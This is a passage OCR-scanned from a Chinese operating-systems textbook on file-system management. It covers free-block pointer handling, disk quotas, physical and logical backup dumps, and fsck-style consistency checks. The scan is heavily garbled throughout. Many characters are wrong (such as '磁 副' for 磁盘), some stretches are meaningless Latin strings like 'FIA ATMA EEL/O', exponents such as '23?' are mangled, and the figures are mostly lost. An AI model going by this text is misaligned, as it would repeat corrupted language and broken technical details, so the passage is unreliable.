中 读 入 一 个 新 的 指针 块 。 类 似 地 ， 当 删除 文件 时 ， 其 磁盘 块 被 释放 ， 
并 添加 a 到 内 存 的 指针 块 中 。 当 这 个 块 填 满 时 ， 束 把 它 写 入 位 盘 。 


在 某 些 特定 情形 下 ， 这 个 方法 产生 了 不 必要 的 磁 副 WO。 考虑 图 4- 
23a 中 的 情形 ， 内 存 中 的 指针 块 只 有 两 个 表 项 了 。 如 果 释 放 了 一 个 有 三 
个 磁盘 块 的 文件 ， 该 指针 块 吏 盗 出 了 ， 必 须 将 其 写 入 人 磁 一 ， 这 了 吏 产 生 


了 疼 4-23b 的 情形 。 如 果 现 在 写 入 台 有 三 个 块 的 文件 ， 满 的 指针 块 不 得 
不 再 次 恋 入 ， 这 将 回 到 图 4-23a 的 情形 。 如 果 有 三 个 块 的 文件 只 古 作 为 
临时 文件 被 写 入 ， 当 它 被 释放 时 ， 就 需要 男 一 个 位 盘 写 操作 ， 以 便 把 
满 鸣 指针 块 写 回 磁盘 。 总 之 ， 当 指针 块 儿 乎 为 宝 时 ， 一 系列 短期 的 临 
时 文件 束 会 引起 大 量 的 磁盘 IO 。 


EE 


图 4-23 引 在 内 存 中 一 个 被 指向 空 几 人 磁盘 块 的 指针 几乎 充满 的 块 ， 以 
及 磁 副 上 三 个 指针 块 ，b) 释 放 一 个 有 三 个 块 的 文件 的 结果 ; c) 处 理 该 二 
个 块 的 文件 的 替代 策略 〈 带 阴影 的 表 项 代表 指向 空 采 磁盘 块 的 指针 ) 


一 个 可 以 避免 过 多 磁盘 VO 的 蔡 代 策略 是 ， 拆 分 满 了 的 指针 块 。 这 
样 ， 当 释放 三 个 块 时 ， 不 再 是 从 图 4-23a 变 化 到 图 4-23b， 而 是 从 图 4- 
23a 变 化 到 图 4-23c。 现 在 ， 系 统 可 以 处 理 一 系列 临时 文件 ， 而 不 需 进行 
任何 磁盘 MO。 如 有 果 内 存 中 指针 块 满 了 7 ， 就 写 入 磁盘 ， 半 满 的 指针 块 从 
磁盘 中 读 入 。 这 里 的 思想 是 : 保持 磁盘 上 的 大 多 数 指针 块 为 满 的 状态 
(减少 磁盘 的 使 用 ) ， 但 是 在 内 存 中 保留 一 个 半 满 的 指针 块 。 这 样 ， 


它 可 以 既 处 理 文件 的 创建 又 同时 处 理 文件 的 删除 操作 ， 而 不 会 为 空闲 
FIA ATMA EEL/O 。 


对 于 位 图 ， 在 内 存 中 只 保留 一 个 块 是 有 可 能 的 ， 只 有 在 该 块 满 了 
或 至 了 的 情形 下 ， 才 到 磁盘 上 取 另 一 块 。 这 样 处 理 的 附加 好 处 和 站， 通 
过 在 位 图 的 单一 块 上 进行 所 有 的 分 配 操 作 ， 磁 副 块 会 较为 紧密 地 涌 集 
在 一 起 ， 从 而 减少 了 磁 副 辟 的 移动 。 由 于 位 图 古 一 种 固定 大 小 的 数据 
结构 ， 所 以 如 果 内 核 是 (部分) 分 页 的 ， 束 可 以 把 位 图 放 在 虚拟 内 存 
内 ， 在 需要 时 将 位 图 的 页 面 调 入 。 


3. 磁 僵 配额 


为 了 防止 人 们 贪心 而 占有 太 多 的 磁盘 空间 ， 多 用 户 操作 系统 稍 常 
提供 一 种 强制 性 磁 表 配额 机 制 。 其 思想 是 系统 管理 员 分 给 每 个 用 户 拥 
有 文件 和 块 的 最 大 数量 ， 操 作 系统 确保 每 个 用 户 不 超过 分 给 他 们 的 配 
额 。 下 面 将 介绍 一 种 典型 的 机 制 。 


当 用 户 打 开 一 个 文件 时 ， 系 统 找 到 文件 属性 和 磁 副 地 址 ， 并 把 它 
们 送 入 内 存 中 的 打开 文件 表 。 其 中 一 个 属性 告诉 文件 所 有 着 是 谁 。 任 
何 有 天 该 文件 大 小 的 增长 都 记 到 所 有 者 的 配额 上 。 


第 二 张 表 包 侣 了 每 个 用 户 当 前 打开 文件 的 配额 记 孙 ， 即 使 是 其 他 
人 打开 该 文件 也 一 样 。 这 张 表 如 图 4-24 所 示 ， 该 表 的 内 容 是 从 被 打开 文 
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打开 文件 表 配额 表 
ate 

磁盘 地 址 硬块 限制 

用 户 一 8 
AC ALS FT 剩余 块 数 通知 
硬 文件 限制 

文件 的 当前 编号 


剩余 文件 数 通知 


用 户 8 的 
配额 
记录 
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图 4-24 在 配额 表 中 记录 了 每 个 用 户 的 配额 


当 在 打开 文件 表 中 建立 一 新 表 项 时 ， 会 产生 一 个 指向 所 有 者 配额 
记录 的 指针 ， 以 便 很 容易 找到 不 同 的 限制 。 每 一 次 往 文 件 中 添加 一 块 
时 ， 文 件 所 有 者 所 用 数据 块 的 总 数 也 增加 ， 引 发 对 配额 硬 限 制 和 软 限 
制 检 查 。 可 以 超出 软 限制 ， 但 硬 限制 不 可 以 超出 。 当 已 达到 硬 限制 
时 ， 再 往 文件 中 添加 内 容 将 引发 错误 。 同 时 ， 对 文件 数目 也 存在 着 类 
似 的 检查 。 


当 用 户 试 图 登录 时 ， 系 统 核查 配额 文件 ， 查 看 该 用 户 文件 数目 或 
做 僵 块 数目 是 否 超过 软 限 制 。 如 果 超 过 了 任 一 限制 ， 则 显示 一 个 警 
， 保 存 的 警告 计数 减 1。 如 果 该 计数 已 为 0， 表 示 用 户 多 次 忽略 该 警 
， 因 而 将 不 允许 该 用 户 登 了 水。 要 想 再 得 到 登录 的 许可 ， 融 必须 与 系 
管理 员 协 商 。 
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这 一 方法 具有 一 种 性 质 ， 即 只 要 用 户 在 退出 系统 前 消除 所 超过 的 
部 分 ， 他 们 就 可 以 在 一 次 终端 会 话 期 间 超过 其 软 限 制 ;但 无 论 什 么 情 
况 下 都 不 能 超过 硬 限 制 。 


44.2 ”文件 系统 备份 


比 起 计算 机 的 损坏 ， 文 件 系 统 的 破坏 往往 要 糟糕 得 多 。 如 有 果 由 于 
火灾 、 内 电 电 流 或 者 一 杯 咖啡 泌 在 键盘 上 而 和 弄 坏 了 计算 机 ， 确 实 让 人 
伤 透 脑筋 ， 而 且 又 要 花 上 一 笔 钱 ， 但 一 般 而 言 ， 更 换 非 常 方便 。 只 
去 计算 机 商店 ， 便 宜 的 个 人 计算 机 在 短 短 一 个 小 时 之 内 残 可 以 更 换 
(当然 ， 如 果 这 发 生 在 大 学 里 面 ， 则 发 出 订单 需 3 个 委员 会 的 同意 ，5 
个 签字 要 花 90 天 的 时 间 ) 。 


不 管 是 硬件 或 软件 的 故障 ， 如 果 计 算 机 的 文件 系统 被 破坏 了 ， 恢 
复 全 部 信息 会 是 一 件 困 难 而 又 费时 的 工作 ， 在 很 多 情况 下 ， 十 不 可 能 
的 。 对 于 那些 丢失 了 程序 、 文 档 、 客 户 文件 、 税 收 记 录 、 数 据 库 、 市 
场 计 划 或 者 其 他 数据 的 用 户 来 说 ， 这 不 党 为 一 次 大 的 灾难 。 尺 管 文件 
系统 无 法 防止 设备 和 介质 的 物理 损坏 ,但 它 至 少 应 能 体 护 信息。 直接 
的 办 法 十 制作 备份 。 但 是 备份 并 不 如 想象 得 那么 人 简单。 让 我 们 开始 考 
察 。 


许多 人 都 认为 不 值得 把 时 间 和 精力 花 在 备份 文件 这 件 事 上 ， 直 到 
某 一 天 磁盘 突然 崩 演 ， 他 们 才 意 识 到 事态 的 严重 性 。 不 过 现在 很 多 公 
司 都 意识 到 了 数据 的 价值 ， 常 常 把 数据 转 到 磁带 上 存储 ， 并 且 每 天 至 
少 做 一 次 备份 。 现 在 位 市 的 容量 大 至 几 十 甚至 儿 百 GB， 而 每 个 GB 仅 仅 


需要 儿 美 分 。 其 实 ， 做 备份 并 不 像 人 们 说 得 那么 烦琐 ， 现 在 就 让 我 们 
来 看 一 下 相关 的 要 点 。 


做 磁 市 备份 主要 是 要 处 理 好 两 个 潜在 问题 中 的 一 个 : 
1) 从 意外 的 灾难 中 恢复 。 
2) 从 错误 的 操作 中 恢复 。 


第 一 个 问题 主要 是 由 磁盘 破裂 、 火 灾 、 洪 水 等 目 然 灾 害 引 起 的 。 
事实 上 这 些 情形 并 不 多 见 ， 所 以 许多 人 也 束 不 以 为 然 。 这些 人 往往 也 
是 以 同样 的 原因 忽略 了 自家 的 火灾 保险 。 


第 二 个 原因 主要 是 用 户 意 外 地 删除 了 原本 还 需要 的 文件 。 这 种 情 
况 发 生得 很 频繁 ， 使 得 Windows 的 设计 者 们 针对 “删除 ”命令 专门 设计 了 
等 殊 目 孙 一 一 “回收 站 ”， 也 束 是 说 ， 在 人 们 删除 文件 的 时 候 ， 文 件 本 
吴 并 不 真正 从 磁盘 上 消失 ， 而 是 被 放置 到 这 个 特殊 目 示 下 ， 待 以 后 需 
要 的 时 候 可 以 还 原 回 去 。 文 件 备份 更 主要 坪 指 这 种 情况 ， 这 束 允 许 几 
天 之 前 ， 甚 至 几 个 星期 之 前 的 文件 都 能 从 原来 备份 的 磁 市 上 还 原 。 


为 文件 做 备份 既 耗 时 间 又 费 空间 ， 所 以 需要 做 得 又 快 又 好 ， 这 一 
点 很 重要 。 基 于 上 述 考虑 我 们 来 看 看 下 面 的 问题 。 首 先 ， 和 是 要 备份 整 
个 文件 系统 还 是 仅 备 份 一 部 分 呢 ? 在 许多 安装 配置 中 ， 可 执行 程序 
(二 进 制 代码 ) 放置 在 文件 系统 树 的 受 限 制 部 分 ， 所 以 如 果 这 些 文件 


能 直接 从 厂商 提供 的 CD-ROM 盘 上 重新 安装 的 话 ， 也 束 没 有 必要 为 它 
们 做 备份 。 此 外 ， 多 数 系 统 都 有 专门 的 临时 文件 目 孙 ， 这 个 目录 也 不 
需要 备份 。 在 UNIX 系 统 中 ， 所 有 的 特殊 文件 (EVOKE) 都 放置 
在 /dev 目 隶 下 ， 对 这 个 目录 做 备份 不 仅 没有 必要 而 且 还 十 分 危险 一 一 因 
为 一 旦 进行 备份 的 程序 试图 读 取 其 中 的 文件 ， 备 份 程序 束 会 永久 挂 
起 。 人 简 而 言 之 ， 合 理 的 做 法 是 只 备份 特定 目录 及 其 下 的 全 部 文件 ， 而 
不 是 备份 整个 文件 系统 。 


其 次 ， 对 前 一 次 备份 以 来 没有 更 改过 的 文件 再 做 备份 是 一 种 痕 
费 ， 因 而 产生 了 增 量 转 储 的 思想 。 节 简单 的 增 量 转 储 形式 丈 是 周期 性 
地 〈 每 周一 次 或 每 月 一 次 ) 做 全 面 的 转 储 (备份 ，， 而 每 天 只 对 当天 
更 改 的 数据 做 备份 。 稍 微 好 一 点 的 做 法 只 备份 目 最 近 一 次 转 储 以 来 更 
改过 的 文件 。 当 然 了 ， 这 种 做 法 极 大 地 缩减 了 转 储 时 间 ， 但 操作 起 来 
却 更 复杂 ， 因 为 最 近 的 全 面 较 储 先 要 全 部 恢复 ， 随 后 按 逆 序 进行 增 量 
转 储 。 为 了 方便 ， 人 们 往往 使 用 更 复杂 的 增 量 转 储 模式 。 


Bo, DOANE Boe, BAERS A R ZB 
对 文件 进行 压缩 就 很 有 必要 。 可 是 对 许多 压缩 算法 而 言 ， 备 份 磁带 上 
的 单个 坏 点 融 能 破坏 解压 缩 算 法 ， 并 导致 整个 文件 甚至 整个 磁 市 无 法 
阅读 。 所 以 是 否 要 对 备份 文件 流 进行 压缩 必须 慎重 考虑 。 


第 四 ， 对 活动 文件 系统 做 备份 是 很 难 的 。 因 为 在 转 储 过 程 中 添 
加 、 删 除 或 修改 文件 和 目 永 可 能 会 导致 文件 系统 的 不 一 致 性 。 不 过 ， 


既然 转 储 一 次 需要 几 个 小 时 ， 那 么 在 晚上 大 部 分 时 间 让 文件 系统 脱 机 
是 很 有 必要 的 ， 昌 然 这 种 做 法 有 时 会 令 人 难以 接受 。 正 因 如 此 ， 人 们 
修改 了 转 储 算法 ， 记 下 文件 系统 的 瞬时 状态 ， 即 复制 关键 的 数据 结 
构 ， 然 后 需要 把 将 来 对 文件 和 目 孙 所 做 的 修改 复制 到 块 中 ， 而 不 是 处 
处 更 新 它们 (Hutchinson A, 1999) 。 这 样 ， 文 件 系 统 在 抓 取 快照 的 
时 候 殉 被 有 效 地 冻结 了 ， 留 待 以 后 空闲 时 再 备份 。 


第 五 ， 即 最 后 一 个 问题 ， 做 备份 会 给 一 个 单位 引入 许多 非 技术 性 
问题 。 如 有 果 当 系统 管理 员 下 楼 去 取 打 印 文件 ， 而 坚 无 防备 地 把 备份 磁 
带 搁置 在 办 公 室 里 的 时 候 ， 束 是 世界 上 最 棱 的 在 线 保安 系统 也 会 失去 
作用 。 这 时 ， 一 个 则 诬 所 要 做 的 只 是 潜入 办 公 室 、 将 一 个 小 磁 市 放 入 
口袋 ， 然 后 绅士 般 地 离开 。 再 见 吧 保安 系统 。 即 使 每 天 都 做 备份 ， 如 
果 碰 上 一 场 大 火烧 光 了 计算 机 和 所 有 的 备份 磁带 ， 那 做 备份 又 有 什么 
意义 呢 ? 由 于 这 个 原因 ， 所 以 备份 磁带 应 该 远离 现场 存放 ， 不 过 这 又 
带 来 了 更 多 的 安全 风险 (因为 ， 现 在 必须 保护 两 个 地 点 了 ) 。 关 于 此 
问题 和 管理 中 的 其 他 实际 问题 ， 请 参考 (Nemeth 等 人 ，2000) 。 接 下 
来 我 们 只 讨论 文件 系统 备份 所 涉及 的 技术 问题 。 


转 储 磁盘 到 位 市 上 有 两 种 方案 : 物理 转 储 和 人 逻辑 转 储 。 物 理 转 储 
征 从 磁 强 的 第 0 块 开 始 ， 将 全 部 的 磁盘 块 按 序 输出 到 磁带 上 ， 直 到 最 后 
一 块 复制 完毕 。 此 程序 很 简单 ， 可 以 确保 万 无 一 失 ， 这 是 其 他 任何 实 
用 程序 所 不 能 比 的 。 
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的 磁盘 块 无 须 备份 。 如 果 转 储 程序 能 够 得 到 访问 空 内 块 的 数据 结构 ， 
就 可 以 避免 该 程序 备份 未 使 用 的 磁 副 块 。 但 是 ， 既 然 磁 市 上 的 第 k 块 并 
不 代表 磁盘 上 的 第 k 块 ， 那 么 要 想 略 过 未 使 用 的 磁盘 块 就 需要 在 每 个 磁 
盘 块 前 边 写 下 该 磁盘 块 的 号 码 (或 其 他 等 效 数据 。 


第 二 个 需要 关注 的 古 坏 块 的 转 储 。 制 造 大 型 磁 副 而 没有 任何 瑕 室 
几乎 是 不 可 能 的 ， 总 古 有 一 些 坏 块 存在 。 有 时 进行 低级 格式 化 后 ， 坏 
块 会 被 检测 出 来 ， 标 记 为 坏 的， 并 被 应 对 这 种 紧急 状况 的 在 每 个 轨道 
末 疹 的 一 些 空闲 块 所 蔡 换 。 在 很 多 情况 下 ， 磁 到 控制 邵 处 理 坏 块 的 殖 
换 过 程 写 透明 的 ， 甚 至 操作 系统 也 不 知道 。 


然而 ， 有 时 格式 化 后 块 也 会 变 坏 ， 在 这 种 情况 下 操作 系统 可 以 检 
测 到 它们 。 通 常 ， 可 以 通过 建立 一 个 包含 所 有 坏 块 的 “文件 ”来 解决 这 
个 问题 一 一 只 要 确保 它们 不 会 出 现在 空 亲 块 池 中 并 且 决 不 会 被 分 配 。 
不 用 说 ， 这 个 文件 是 完全 不 能 够 读 取 的 。 


如 有 磁盘 控制 硕 将 所 有 坏 块 重新 映射 ， 并 对 操作 系统 隐藏 的 话 ， 
物理 转 储 工作 还 是 能 够 顺利 进行 的 。 男 一 方面 ， 如 果 这 些 坏 块 对 操作 
系统 可 见 并 映射 到 在 一 个 或 几 个 坏 块 文件 或 者 位 图 中 ， 那 么 在 转 储 过 
程 中 ， 物 理 转 储 程序 绝对 有 必要 能 访问 这 些 信息 ， 并 避免 转 储 之 ， 从 
而 防止 在 对 坏 块 文件 备份 时 的 无 止境 磁盘 读 错误 发 生 。 


物理 转 储 的 主要 优点 是 简单 、 极 为 快速 〈 基 本 上 是 以 磁盘 的 速度 
运行 ) 。 主 要 缺点 是 ， 既 不 能 跳 过 选 定 的 目录 ， 也 无 法 增 量 转 储 ， 还 
不 能 满足 恢复 个 人 文件 的 请 求 。 正 因 如 此 ， 绝 大 多 数 配 置 部 使 用 人 逻辑 
转 储 。 


逻辑 转 储 从 一 个 或 几 个 指定 的 目录 开始 ， 促 归 地 转 储 其 日 给 是 基 
准 日 期 (例如 ， 最 近 一 次 增 量 转 储 或 全 面 系统 转 储 的 日 期 后 有 所 更 
改 的 全 部 文件 和 目 孙 。 所 以 ， 在 逻辑 转 储 中 ， 转 储 磁 带 上 会 有 一 连 串 
精心 标识 的 目 孙 和 文件 ， 这 样 就 很 容易 满足 恢复 特定 文件 或 目录 的 请 
K o 


既然 逻辑 转 储 是 最 为 普遍 的 形式 ， 束 让 我 们 以 图 4-25 为 例 来 仔细 研 
完 一 个 通用 算法 。 该 算法 在 UNIX 系 统 上 广 为 使 用 。 在 图 中 可 以 看 到 一 
棵 由 目录 ( 方 框 ) 和 文件 (圆圈 ) 组 成 的 文件 树 。 被 阴影 覆盖 的 项 目 
代表 自 基 准 日 期 以 来 修改 过 ， 因 此 需要 转 储 ， 无 阴影 的 则 不 需要 转 
储 。 
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图 4-25 待 转 储 的 文件 系统 ， 其 中 方 框 代表 目 孙 ， 圆 图 代表 文件 。 被 
阴影 履 瘟 的 项 目 表 示 目 上 次 较 储 以 来 修改 过 。 每 个 目 永 和 文件 都 被 标 


上 其 节点 号 


该 算法 还 转 储 通 向 修改 过 的 文件 或 目录 的 路 径 上 的 所 有 目录 (其 
至 包括 未 修改 的 目录 ) ， 原 因 有 二 。 其 一 是 为 了 将 这 些 转 储 的 文件 和 
目 孙 恢复 到 另 一 台 计 算 机 的 者 文件 系统 中 。 这 样 ， 转 储 程序 和 恢复 程 
序 束 可 以 在 计算 机 之 间 进 行文 件 系统 的 整体 转移 。 


转 储 被 修改 文件 之 上 的 未 修改 目录 的 第 二 个 原因 是 为 了 可 以 对 单 
个 文件 进行 增 量 恢复 〈 很 可 能 是 对 轴 蠢 操作 所 损坏 文件 的 恢复 ) 。 设 
想 如 果 星 期 天 晚上 转 储 了 整个 文件 系统 ， 星 期 一 晚上 又 做 了 一 次 增 量 
转 储 。 在 星期 二 ，/usr/jhs/proj/nr3 目 录 及 其 下 的 全 部 目录 和 文件 被 删除 


了 。 星 期 三 一 大 早 用 户 又 想 恢 复 /usr/jhs/proj/nr3/plans/summary 文 件 。 但 
因为 没有 设置 ， 所 以 不 可 能 单独 恢复 summary 文 件 。 必 须 首先 恢复 nr3 
和 plans 这 两 个 目录 。 为 了 正确 获取 文件 的 所 有 者 、 模 式 、 时 间 等 各 种 
信息 ， 这 些 目 录 当 然 必须 再 次 备份 到 转 储 磁带 上 ， 尽 管 自 上 次 完整 转 
储 以 来 它们 并 没有 修改 过 。 
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了 几 位 。 随 着 算法 的 执行 ， 位 图 中 的 这 些 位 会 被 设置 或 清除 。 算 法 的 
执行 分 为 四 个 阶段 。 第 一 阶段 从 起 始 目录 (本 例 中 为 根 目 录 ) 开始 检 
查 其 中 的 所 有 目录 项 。 对 每 一 个 修改 过 的 文件 ， 该 算法 将 在 位 图 中 标 
记 其 i 让 点 。 算 法 还 标记 并 递归 检查 每 一 个 目录 (不 管 是 否 修改 过 ) 。 


第 一 阶段 结束 时 ， 所 有 修改 过 的 文件 和 全 部 目录 都 在 位 图 中 标记 
了 ， 如 图 4-26a 所 示 (以 阴影 标记 ) 。 理 论 上 说 来 ， 第 二 阶段 再 次 递归 
地 遍历 目录 树 ， 并 去 掉 目 录 树 中 任何 不 包含 被 修改 过 的 文件 或 目录 的 
目录 上 的 标记 。 本 阶段 的 执行 结果 如 图 4-26b 所 示 。 注 意 ，i 点 号 为 
10、11、14、27、29 和 30 的 目录 此 时 已 经 被 去 掉 标记 ， 因 为 它们 所 包 
舍 的 内 容 没 有 做 任何 修改 。 它 们 因而 也 不 会 被 转 储 。 相 反 ，i 节 点 号 为 5 
和 6 的 目录 尽管 没有 被 修改 过 也 要 被 转 储 ， 因 为 到 新 的 机 器 上 恢复 当日 
的 修改 时 需要 这 些 信息 。 为 了 提高 算法 效率 ， 可 以 将 这 两 阶段 的 目录 
树 裔 历 合 二 为 一 。 
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图 4-26 逻辑 转 储 算法 所 使 用 的 位 图 
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现在 哪些 目 永 和 文件 必须 被 转 储 已 经 很 明确 了 ， 融 是 图 4-26b 中 所 
标记 的 部 分 。 第 三 阶段 算法 将 以 节点 号 为 序 ， 扫 描 这 些 i 点 并 转 储 所 
有 标记 的 目录 ， 如 图 4-26c 所 示 。 为 了 进行 恢复 ， 每 个 被 转 储 的 目 邓 部 
用 目录 的 属性 (所 有 者 、 时 间 等 作为 前 级 。 最 后 ， 在 第 四 阶段 ， 在 
图 4-26d 中 被 标记 的 文件 也 被 转 储 ， 同 样 ， 由 其 文件 属性 作为 前 级 。 
此 ， 转 储 结 


从 转 储 磁带 上 恢复 文件 系统 很 容易 办 到 。 首 先 要 在 磁盘 上 创建 一 
个 空 的 文件 系统 ， 然 后 恢复 最 近 一 次 的 完整 转 储 。 由 于 磁带 上 最 先 出 
现 目录 ， 所 以 首先 恢复 目录 ， 给 出 文件 系统 的 框架 ， 然 后 恢复 文件 本 
身 。 在 完整 转 储 之 后 的 是 增 量 转 储 ， 重 复 这 一 过 程 ， 以 此 类 推 。 
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块 列表 并 不 是 一 个 文件 ， 那 么 在 所 有 被 转 铺 的 文件 恢复 完毕 之 后 ， 束 
需要 从 雯 开始 重 狐 构造。 这 一 点 可 以 办 到 ， 因 为 全 部 空闲 块 的 集合 恰 
好 是 包含 在 全 部 文件 中 的 块 集合 的 补 集 。 


Fy — PEA FER ° UFR POP EERE AP LS TA 
中 ， 要 注意 在 恢复 时 只 对 该 文件 恢复 一 次 ， 然 后 要 恢复 所 有 指向 该 文 
FFE) SK E 
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入 更 多 的 子 节 ， 这 人 么 做 是 合法 的 。 但 两 者 之 间 的 这 些 块 并 不 属于 文件 
本 喘 ， 从 而 也 不 应 该 在 其 上 实施 转 储 和 恢复 操作 。 核 心 文件 通 第 在 数 
据 段 和 堆栈 段 之 间 有 一 个 数 百 兆 子 市 的 空洞 。 如 琳 处 理 不 得 当 ， 每 个 
被 恢复 的 核心 文件 会 以 “0” 填 元 这 些 区域 ， 这 可 能 导致 该 文件 与 虚拟 地 
址 空间 一 样 大 (例如 ，23? 字 节 ， 更 糟糕 可 能 会 达到 2% 字 记 ) 。 


最 后 ， 无 论 属于 哪 一 个 目录 (它们 并 不 一 定局 限于 /dev 目 录 下 ) ， 
特殊 文件 、 命 名 管道 以 及 类 似 的 文件 都 不 应 该 转 储 。 关 于 文件 系统 
份 的 更 多 信息 ， 请 参考 〈Chervenak 等 人 ，1998;Zwicky，1991) œ 


们 带 密度 不 会 像 磁盘 密度 那样 改进 得 那么 快 。 这 会 逐渐 导致 备份 
一 个 很 大 的 磁 副 需要 多 个 磁带 的 状况 。 当 磁带 机 器 人 可 以 目 动 换 磁带 
时 ， 如 条 这 种 趋 劳 继续 下 去 ， 作 为 一 种 备份 介质 ， 磁 市 会 最 终 变 得 太 
小 。 在 那 种 情况 下 ， 备 份 一 个 磁 副 的 惟一 的 方式 是 在 另 一 个 位 一 上 。 
对 每 一 个 磁盘 直接 做 镜像 症 一 种 方式 。 一 个 更 加 复杂 的 方案 ， 称 为 


RAID， 将 会 在 第 5 章 讨 论 。 


4.4.3 ”文件 系统 的 一 致 性 


影响 文件 系统 可 靠 性 的 另 一 个 问题 是 文件 系统 的 一 致 性 。 很 多 文 
件 系统 读 取 位 强 块 ， 进 行 修改 后 ， 再 写 回 位 僵 。 如 有 果 在 修改 过 的 磁 表 
块 全 部 写 回 之 前 系统 朋 种 ， 则 文件 系统 有 可 能 处 于 不 一 致 状态 。 如 采 
一 些 未 补 写 回 的 块 是 iP 点 块 、 目 孙 块 或 者 是 包含 有 择 朵 表 的 块 时 ， 这 
个 问题 尤为 挛 重 。 


为 了 解决 文件 系统 的 不 一 致 回 题 ， 很 多 计算 机 都 市 有 一 个 实用 程 
序 以 检 难 文件 系统 的 一 致 性 。 例 如 ，UNIX 有 fsck， 而 Windows 用 
scandisk。 系 统 启 动 时 ， 特 别 是 裔 窒 之 后 的 重新 启动 ， 可 以 运行 该 实用 
程序 。 下 面 我 们 介绍 在 UNIX 中 这 个 fsck 实 用 程序 是 怎样 工作 的 。 
scandisk 有 所 不 同 ， 因 为 它 工 作 在 为 一 种 文件 系统 上 ， 不 过 运用 文件 系 
统 的 内 在 见 余 进行 修复 的 一 般 原理 仍然 有 效 。 所 有 文件 系统 检验 程序 
可 以 独立 地 检验 每 个 文件 系统 〈 磁 盘 分 区 ) 的 一 致 性 。 


一 致 性 检查 分 为 两 种 : 块 的 一 致 性 检查 和 文件 的 一 致 性 检查 。 在 
检查 块 的 一 致 性 时 ， 程 序 构造 两 张 表 ， 每 张 表 中 为 每 个 块 设立 一 个 计 
数 右 ， 都 初始 化 为 0。 第 一 个 表 中 的 计数 夯 跟 踩 该 块 在 文件 中 的 出 现 次 
数 ， 第 二 个 表 中 的 计数 句 跟 踊 该 块 在 空 几 表 中 的 出 现 次 数 。 


接着 检验 程序 使 用 原始 设备 读 取 全 部 的 i 节 点 ， 名 略 文件 的 结构 ， 
只 返回 所 有 的 磁盘 块 ， 从 0 开始 。 由 证 点 开始 ， 可 以 建立 相应 文件 中 采 
用 的 全 部 块 的 块 号 表 。 每 当 读 到 一 个 块 号 时 ， 该 块 在 第 一 个 表 中 的 计 
数 器 加 1。 然 后 ， 该 程序 检查 空 几 表 或 位 图 ， 查 找 全 部 未 使 用 的 块 。 
当 在 空腹 表 中 找到 一 个 块 时 ， 吏 会 使 它 在 第 二 个 才 中 的 相应 计数 夯 加 
1 。 


如 有 条文 件 系 统一 致 ， 则 每 一 块 或 者 在 第 一 个 表 计 数 郁 中 为 1， 或 者 
在 第 二 个 表 计 数 器 中 为 1， 如 图 4-27a 所 示 。 但 是 当 系 统 裔 省 后 ， 这 两 张 
表 可 能 如 网 4-27b 所 示 ， 其 中 ， 人 磁 副 块 2 没 有 出 现在 任何 一 张 表 中 ， 这 称 
为 块 丢 失 。 尽 管 块 丢失 不 会 造成 实际 的 损害 ， 但 它 的 确 痕 费 了 和 磁 弄 罕 
间 ， 减 少 了 磁盘 容量 。 块 丢失 问题 的 解决 很 容易 ， 文 件 系统 检验 程序 
把 它们 加 到 空 几 表 中 即 可 。 


有 可 能 出 现 的 男 一 种 情况 如 图 4-27c 所 示 。 其 中 ， 块 4 在 空闲 表 中 出 
现 了 2 次 (只 在 空间 表 是 真正 意义 上 的 一 张 表 时 ， 才 会 出 现 重复 ， 在 位 
图 中 ， 不 会 发 生 这 类 情况 ) 。 解 决 方法 也 很 简单 : 只 要 重新 建立 空闲 
表 即 可 。 


最 精 的 情况 是 ， 在 两 个 或 多 个 文件 中 出 现 同一 个 数据 块 ， 如 图 4- 
27d 中 的 块 5。 如 琳 其 中 一 个 文件 被 删除 ， 块 5 会 添加 到 空 帮 表 中 ， 导 致 
一 个 块 同时 处 于 使 用 和 空 风 两 种 状态 。 硅 删除 这 两 个 文件 ， 那 么 在 空 
内 表 中 这 个 磁盘 块 会 出 现 两 次 。 


块 号 块 号 
2345 67 8 9101112131415 0123456 7 8 9101112131415 
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01234567 8 9 101112131415 1234567 8 9 101112131415 
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c) d) 


图 4-27 文件 系统 状态 : A` M: REA; o) 空 亲 表 中 有 重复 块 ; 
d) 重 复数 据 块 


文件 系统 检验 程序 可 以 采取 相应 的 处 理 方法 是 ， 移 分 配 一 空闲 
块 ， 把 块 5 中 的 内 容 复 制 到 空 内 块 中 ， 然 后 把 它 插 到 其 中 一 个 文件 之 
中 。 这 样 文件 的 内 容 未 改变 (虽然 这 些 内 容 几 乎 可 以 肯定 是 不 对 
的 ) ， 但 至 少 保持 了 文件 系统 的 一 致 性 。 这 一 错误 应 该 报告 ， 由 用 户 
检查 文件 受 损 情 况 。 


除 检查 每 个 磁 副 块 计数 的 正确 性 之 外 ， 文 件 系 统 检 验 程序 还 检 
目录 系统 。 此 时 也 要 用 到 一 张 计数 器 表 ， 但 这 时 是 一 个 文件 (而 不 是 
一 个 块 ) 对 应 于 一 个 计数 器 。 程 序 从 根 目录 开始 检验 ， 沿 着 目录 树 冲 
归 下 降 ， 检 查 文件 系统 中 的 每 个 目 示 。 对 每 个 目录 中 的 每 个 文件 ， 将 
文件 使 用 计数 器 加 1。 要 注意 ， 由 于 存在 硬 连 接 ， 一 个 文件 可 能 出 现在 


两 个 或 多 个 目录 中 。 而 直到 符号 连接 是 不 计数 的 ， 不 会 对 目标 文件 的 
计数 器 加 1 。 


在 检验 程序 全 部 完成 后 ， 得 到 一 张 由 i 点 号 索引 的 表 ， 说 明 每 个 
文件 被 多 少 个 目录 包含 。 然 后 ， 检 验 程序 将 这 些 数字 与 存储 在 文件 i 
扩 中 的 连接 数目 相 比 较 。 当 文件 创建 时 ， 这 些 计 数 咽 从 1 开始 ， 随 着 每 
次 对 文件 的 一 个 ( 硬 ) 连接 的 产生 ， 对 应 计数 器 加 1。 如 果 文 件 系 统一 
致 ， 这 两 个 计数 应 相等 。 但 是 ， 有 可 能 出 现 两 种 错误 ， 即 i 节点 中 的 连 
接 计 数 太 大 或 者 太 小 。 


如 条 iT 点 的 连接 计数 大 于 目 永 项 个 数 ， 这 时 即使 所 有 的 文件 都 从 
目 孙 中 删除 ， 这 个 计数 仍 是 非 0，iP 点 不 会 被 删除 。 该 错误 并 不 广 重 ， 
却 因为 存在 不 属于 任何 目录 的 文件 而 浪费 了 磁盘 空间 。 为 改正 这 一 错 
误 ， 可 以 把 i 贡 点 中 的 连接 计数 设 成 正确 值 。 


另 一 种 错误 则 是 浅 在 的 灾难 。 如 有 宁 同 一 个 文件 连接 两 个 目 孙 项 ， 
但 其 i 点 连接 计数 只 为 1， 如 有 删除 了 任何 一 个 目 孙 项 ， 对 旋 i 点 连 
接 计 数 变 为 0。 当 i 和 点 计数 为 0 时 ， 文 件 系统 标志 该 i 放 点 为 “ 末 使 用 ”， 
